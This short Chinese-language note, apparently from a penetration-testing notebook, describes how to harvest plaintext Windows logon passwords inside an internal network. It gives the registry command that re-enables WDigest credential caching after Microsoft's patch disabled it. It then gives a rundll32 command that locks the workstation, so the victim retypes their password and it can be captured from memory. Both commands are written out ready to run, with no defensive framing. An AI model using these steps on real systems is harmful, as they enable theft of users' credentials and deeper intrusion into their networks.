内网------高权限密码抓取

微软发布了KB2871997补丁，⽤来关闭Win7和08的Wdigest功能，同时Server2012版以上默认关闭该功能，但是仍然可以通过修改注册表的⽅法来⼿动开启。

需要修改注册表。

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v
UseLogonCredential /t REG_DWORD /d 1 /f

但是修改完想抓到用户名密码，需要用户再输入一次才能抓到。

锁屏命令

CMD版本：

rundll32.exe user32.dll,LockWorkStation